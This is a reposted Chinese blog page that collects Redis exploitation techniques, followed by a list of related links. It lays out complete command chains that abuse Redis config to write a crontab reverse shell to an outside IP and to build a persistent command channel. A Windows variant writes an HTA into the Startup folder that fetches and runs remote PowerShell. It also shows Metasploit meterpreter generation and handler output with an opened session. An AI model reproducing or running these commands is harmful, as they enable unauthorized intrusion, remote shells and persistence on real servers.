【转】redis利用姿势收集
redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;
测试环境:CentOS,RHEL
# 利用crontab反弹shell
redis-cli flushall echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1 redis-cli config set dir /var/spool/cron/ redis-cli config set dbfilename root redis-cli save
# 利用crontab创建文件 /tmp/888
redis-cli flushall # 为了方便测试 redis-cli set test 'test' redis-cli set my 'mymymymymymymymymymymymy' redis-cli set word 'wordwordwordwordwordword' redis-cli set hello 'ringzero' redis-cli set word1 'word1word1word1word1word1word1' echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1 redis-cli config set dir /var/spool/cron/ redis-cli config set dbfilename root redis-cli save
redis-cli flushall echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1 redis-cli config set dir /var/spool/cron/ redis-cli config set dbfilename root redis-cli save
# 二次改写crontab
redis-cli flushall redis-cli set 2 ';a=`redis-cli get c`;' redis-cli set 1 'id;redis-cli set r `$a`;#' redis-cli config set dir /tmp/ redis-cli config set dbfilename w redis-cli save redis-cli set c whoami
# 利用第一步的写crontab步骤,完成下面的命令
echo " " > /tmp/zz cat /tmp/w >> /tmp/zz /bin/sh /tmp/zz redis-cli get r
控制 /var/spool/cron/root 和 /tmp/zz
# 最终实现,每10秒从redis的c变量读入要执行的命令,再将执行结果写入变量r
* * * * * sleep 10;/bin/sh /tmp/zz
windows利用方式(转自90sec)
redis 官方未发布windows版本,但是野外存在redis/win版本。
在测试时发现一windows版本redis,遂开始搞。
直接上利用,基于msf:
root@weisuo.org:~# cat hta-psh.txt <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
[url=mailto:root@weisuo.org]root@weisuo.org[/url]:~# cat hta-psh.txt |redis-cli -x -h 192.168.138.27 set a
OK
hta-psh.txt 对一些字符串进行变通,如不,在写入时会导致字符串丢失。
#msfconsole use payload/windows/meterpreter/reverse_tcp generate -t hta-psh -f /var/www/1.ps1 #之后起个handle,略
修改1.ps1,文件内容大概如下:
$command=”powershell -nop -w hidden -e xxxxxxxxxxxxxxxx”;iex $command;$command2=”taskkill /im mshta.exe”;iex $command2;
最后写入文件,等待管理员登陆
oot@weisuo.org:~# redis-cli -h 192.168.138.27 redis 192.168.138.27:6379> CONFIG GET dir 1) "dir" 2) "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" redis 192.168.138.27:6379> config get dbfilename 1) "dbfilename" 2) "2.hta" redis 192.168.138.27:6379> save OK redis 192.168.138.27:6379>[/p][p=20, null, left]
msf exploit(handler) > rexploit -j -z [*] Stopping existing job... [*] Reloading module... [*] Exploit running as background job.[*] Started reverse TCP handler on 119.91.151.22:80 msf exploit(handler) > [*] Starting the payload handler... [*] Sending stage (957999 bytes) to 60.111.27.14 [*] Meterpreter session 4 opened (119.91.151.22:80 -> 60.191.37.34:56301) at 2016-06-06 11:06:00 -0400 [*] Session ID 4 (119.91.151.22:80 -> 60.111.27.14:56301) processing AutoRunScript 'migrate -f' [*] Current server process: powershell.exe (4896) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3768 [+] Successfully migrated to process
【转】redis利用姿势收集相关推荐
- hopper_如何利用卫星收集的遥感数据轻松对蚱hopper中的站点进行建模
hopper 建筑学与数据科学 (Architectonics and Data Science) Understanding the site and topography are crucial ...
- Redis利用方式总结(Linux/Windows)
原文在这:https://blog.csdn.net/qq_26091745/article/details/117222362?utm_source=app&app_version=4.17 ...
- Redis 利用Hash存储节约内存
redis系列文章目录 Redis 利用Hash存储节约内存 使用spring-data-redis实现incr自增 Redis学习笔记(九)redis实现时时直播列表缓存,支持分页[热点数据存储] ...
- Linux下的格式化字符串漏洞利用姿势
[转]http://www.cnblogs.com/Ox9A82/p/5429099.html linux最早的漏洞防护机制nx-stack刚刚出现后就有人想出了突破方法.那就是只有栈是不可执行,而除 ...
- java dataset redis,利用Spring-Data-Redis和Jedis操作Redis缓存
概述 Jedis是redis官方推荐的用于访问Java客户端,在https://github.com/xetorthio/jedis下载最新的jedis. 访问redis 1.访问简 ...
- PHP-Swoole+tp3+websocket+redis,利用接口制作客服实时对话聊天服务器
菜鸟一个,接受评价 直奔主题 1.在php中引入swoole扩展 2.利用swoole搭建websocket聊天服务器 tp3根目录创建server目录,用来存放搭建服务器的php文件,命名serve ...
- excel 汇总 mysql_利用mysql收集excel录入汇总
2017年本人被借调到教育局收集全县的扶贫数据,数据以EXCEL表格的方式分学校上报到乡镇教育管理中心汇总,然后教管中心上报到县资助中心汇总.这项工作看似简单,但却给我带来了无限的烦恼.上报上来的数据 ...
- php redis incr过期时间,Redis 利用 incr 和 expire 来限流, 并发导致过期时间失效问题...
当某一个接口需要限流时,可以采用redis的incr来递增,记录访问次数, 以及 expire 来设置失效时间. 大概的代码如下: r = redis.Redis.connect() key = &q ...
- 利用python收集网上新闻-利用新闻情感数据炒股 python程序
下面是编程之家 jb51.cc 通过网络收集整理的代码片段. 编程之家小编现在分享给大家,也给大家做个参考. from CAL.PyCAL import Date start = "2010 ...
- 网安面试题汇总--持续记录
介绍:我是一名保安,保卫一方平安,深爱业主小丹,喜欢小熊饼干. 笔者回尝试回答一下面试题并记录,欢迎大佬写下高见. 如下网安面试题,如有侵权,联系笔者删除. 渗透测试(红队攻防) 代码审计 安全研究 ...
最新文章
- 关于SQLServer和MySQL动态条数限制
- gRPC in ASP.NET Core 3.x - gRPC 简介(1)
- java学习(36):数组排序
- linux中检测用户信息的命令是,在Linux系统上检查用户所属组
- 补充“为什么Scrum不行”
- oracle讲师视频教程,赵强老师:Oracle数据库系列视频课程
- 关于亿图图示缩放锁定1%的问题
- 计算机文件夹操作有哪些,电脑操作常用的快捷键有哪些
- Gflops是什么?
- python datetime库的基本使用
- 获取斗鱼直播间的弹幕信息
- linux dbm数据库,Linux dbm遇到的一些问题
- 《算法艺术与信息学竞赛》之 递推 例一 月亮之眼 vijos 1540
- sh报错segmentation fault
- 机器人在课堂上所表达的新科技发展观
- Synchronized锁升级:无锁-> 偏向锁 -> 轻量级锁 -> 重量级锁
- 7-1 计算物体自由下落的距离
- pyecharts源码解读(10)渲染包render之templates目录:渲染模板
- 赛灵思Xilinx可用资源的获取途径
- 能不动手就不动手!数据处理时多用这些批处理